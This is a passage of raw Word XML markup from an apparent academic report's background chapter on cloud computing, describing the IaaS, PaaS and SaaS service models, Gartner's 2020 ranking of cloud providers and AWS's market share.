          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB8C536" w14:textId="423DD89E" w:rsidR="00BE687D" w:rsidRPr="00BD4B9E" w:rsidRDefault="0020185B" w:rsidP="0020185B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc71138474"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00BE687D" w:rsidRPr="00BD4B9E">
        <w:t>Background</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="54673819" w14:textId="0B4C50B7" w:rsidR="00714386" w:rsidRPr="00963E23" w:rsidRDefault="0020185B" w:rsidP="0020185B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc71138475"/>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00550F73" w:rsidRPr="00963E23">
        <w:t>Cloud</w:t>
      </w:r>
      <w:r w:rsidR="00991451" w:rsidRPr="00963E23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF28F1">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00991451" w:rsidRPr="00963E23">
        <w:t>omputing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="2B85E777" w14:textId="2BD5EA4B" w:rsidR="00F10045" w:rsidRDefault="00575961" w:rsidP="00523171">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The concept of c</w:t>
      </w:r>
      <w:r w:rsidR="00963E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>loud computing was first</w:t>
      </w:r>
      <w:r w:rsidR="0022456B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduced and</w:t>
      </w:r>
      <w:r w:rsidR="00963E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> invented by Joseph Carl Robnett Licklider, in the early 1960s during his research on Advanced Research Project Agency Network, also known as ARPANet (Pedamkar, </w:t>
      </w:r>
      <w:r w:rsidR="000D26FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidR="00963E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">However, the term “cloud computing” was believed </w:t>
      </w:r>
      <w:r w:rsidR="00F10045">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">by many </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">to have been first </w:t>
      </w:r>
      <w:r w:rsidR="00732DED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>popularised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the term was introduced by then Google CEO Eric Schmidt during the Search Engine Strategies Conference on 9 August 2006 (Schmidt, 2006).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9420E" w14:textId="5DD83049" w:rsidR="008A5018" w:rsidRDefault="008A5018" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Cloud Security Alliance</w:t>
      </w:r>
      <w:r w:rsidR="00DE0FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CSA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, 2017, defin</w:t>
      </w:r>
      <w:r w:rsidR="00AD7DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ed cloud computing as a new set of technologies that is used to manage shared pools of configurable computing resources such as applications, servers and storage on demand and with convenience.</w:t>
      </w:r>
      <w:r w:rsidR="002F3BB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is also an operational model that provides swift provisioning, implementation and decommissioning of resources on demand and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D910BC1" w14:textId="42E53F15" w:rsidR="00963E23" w:rsidRPr="00E86DA4" w:rsidRDefault="00EB32FF" w:rsidP="00EB32FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc71138476"/>
      <w:r>
        <w:t xml:space="preserve">2.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00AF28F1" w:rsidRPr="00E86DA4">
        <w:t>Cloud Service Models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="0F2932E0" w14:textId="6D5A8448" w:rsidR="00AF28F1" w:rsidRDefault="00867AFA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Mell and Grance, 2011, from the National Institute of Standards and Technology (NIST) explained that the cloud model composes of three service modes </w:t>
      </w:r>
      <w:r w:rsidR="00B13DB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">(Figure 1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00B13DB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Infrastructure as a Service (IaaS)</w:t>
      </w:r>
      <w:r w:rsidR="00E04639">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, Platform as a Service (PaaS) and Software as a Service (SaaS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D84406" w14:textId="4767E908" w:rsidR="00CF5102" w:rsidRDefault="000546AA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00CF5102">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">IaaS provides the consumer the ability to manage the applications, data, runtime, middleware and OS, while the service provider manages virtualisation, servers, storage and networking. An example of IaaS is </w:t>
      </w:r>
      <w:r w:rsidR="00C3180A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>cloud infrastructure provider, DigitalOcean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1372B" w14:textId="5B4C49C0" w:rsidR="00CF5102" w:rsidRDefault="000546AA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00CF5102">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PaaS</w:t>
      </w:r>
      <w:r w:rsidR="00C3180A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides the consumer the ability to manage the application and data, while the service provider manages runtime, middleware, OS, virtualisation, servers, storage and networking. An example of PaaS is cloud application platform provider, Heroku.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3484E6" w14:textId="7B22AC49" w:rsidR="00E04639" w:rsidRDefault="00C3180A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike IaaS and PaaS, </w:t>
      </w:r>
      <w:r w:rsidR="00E04639">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SaaS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> leaves all the management of applications, data, runtime, middleware, OS, virtualisation, servers, storage and networking to the service provider. An example of SaaS is </w:t>
      </w:r>
      <w:r w:rsidR="00B744E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Adobe Creative Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38556A" w14:textId="55FB384E" w:rsidR="00FB4C89" w:rsidRDefault="00FB4C89" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The traditional model, also known as on-premise, is where the consumer is left to manage everything, which would be the exact opposite of SaaS.</w:t>
      </w:r>
      <w:r w:rsidR="00D62C0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An example of on-premise is Adobe Creative Cloud’s predecessor, Adobe Creative Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A5BC7" w14:textId="69AFAFE4" w:rsidR="00EB3082" w:rsidRDefault="0071162A" w:rsidP="00EB3082">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="564418A1" wp14:editId="2DCC285B">
            <wp:extent cx="5731510" cy="3201670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Picture 33" descr="20100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001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01670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F5A04F" w14:textId="75BD72DE" w:rsidR="005E5225" w:rsidRPr="00EF3F75" w:rsidRDefault="00EB3082" w:rsidP="00EB3082">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc71138519"/>
      <w:r w:rsidRPr="00EF3F75">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3F75">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EF3F75">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EF3F75">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3F75">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EF3F75">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Cloud Service Model (Chou, 2018)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="4F18823E" w14:textId="1975E5B4" w:rsidR="00E04639" w:rsidRPr="00DE0FFF" w:rsidRDefault="00EB32FF" w:rsidP="00EB32FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc71138477"/>
      <w:r>
        <w:t xml:space="preserve">2.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="0068781E" w:rsidRPr="00DE0FFF">
        <w:t>Cloud Service Providers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="43F67635" w14:textId="23EEA9CC" w:rsidR="0068781E" w:rsidRDefault="00BF477A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Harvard (</w:t>
      </w:r>
      <w:r w:rsidR="00422C3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00DE0FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, defined Cloud Service Providers </w:t>
      </w:r>
      <w:r w:rsidR="007955B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidR="002644B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>external IT services vendor</w:t>
      </w:r>
      <w:r w:rsidR="00852760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002644B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provide partial or fully managed services to </w:t>
      </w:r>
      <w:r w:rsidR="00502825">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">supplement or outsource all </w:t>
      </w:r>
      <w:r w:rsidR="002644B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>internal IT capacity or functions</w:t>
      </w:r>
      <w:r w:rsidR="007955B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6AD0B" w14:textId="32757E19" w:rsidR="00D469DA" w:rsidRDefault="00205FDA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There are plenty of cloud service providers in the market today</w:t>
      </w:r>
      <w:r w:rsidR="006F79FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Gartner, 2020)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Salesforce pioneered the market as the world’s first cloud service provider. In 2020, Gartner announced in their Magic Quadrant for Cloud Infrastructure and Platform Services, that Amazon Web Services (AWS) was the leader</w:t>
      </w:r>
      <w:r w:rsidR="00EC39B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>amongst all the cloud service providers for the 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00205FDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> consecutive year</w:t>
      </w:r>
      <w:r w:rsidR="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure 2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000D373D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Two other leaders in the Magic Quadrant were Microsoft as the runner up and Google in third place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2C9F6" w14:textId="175BE773" w:rsidR="008716D0" w:rsidRDefault="00EC39B0" w:rsidP="00EF3F75">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0719DF2D" wp14:editId="0C1636E4">
            <wp:extent cx="3912781" cy="3912781"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="Picture 34" descr="Magic Quadrant for Cloud Infrastructure and Platform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gic Quadrant for Cloud Infrastructure and Platform Servic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2517" cy="3922517"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCAF561" w14:textId="1E3594F6" w:rsidR="00EF3F75" w:rsidRDefault="00EF3F75" w:rsidP="00EF3F75">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc71138520"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Magic Quadrant for </w:t>
      </w:r>
      <w:r w:rsidRPr="0033164C">
        <w:t>Cloud Infrastructure and Platform Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> (Gartner, 2020)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="670B2DB3" w14:textId="5603CFBC" w:rsidR="00C53656" w:rsidRPr="008F023F" w:rsidRDefault="00C17AEA" w:rsidP="00C17AEA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc71138478"/>
      <w:r>
        <w:t xml:space="preserve">2.1.3 </w:t>
      </w:r>
      <w:r w:rsidR="00C53656" w:rsidRPr="008F023F">
        <w:t>Amazon Web Services (AWS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="0E0239FC" w14:textId="3FCBC1DC" w:rsidR="008F023F" w:rsidRDefault="00116709" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="008F023F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>eing the leader of cloud service providers,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was reported to lead the USD 1</w:t>
      </w:r>
      <w:r w:rsidR="002F6FB0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> billion cloud market by holding 32% of the market’s share</w:t>
      </w:r>
      <w:r w:rsidR="00A0177F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the fourth quarter of 2020 (Ritcher, 2021)</w:t>
      </w:r>
      <w:r w:rsidR="00FD0D9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F64C05">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS entered the market as a subsidiary of Amazon.com in 2006</w:t>
      </w:r>
      <w:r w:rsidR="00CA0763">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A307B" w14:textId="51EC280C" w:rsidR="000D7B5F" w:rsidRDefault="00B5346B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Even today, </w:t>
      </w:r>
      <w:r w:rsidR="000D7B5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>AWS is always</w:t>
      </w:r>
      <w:r w:rsidR="00E4437C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> significantly</w:t>
      </w:r>
      <w:r w:rsidR="000D7B5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> growing its </w:t>
      </w:r>
      <w:r w:rsidR="00E4437C">
        <w:rPr>
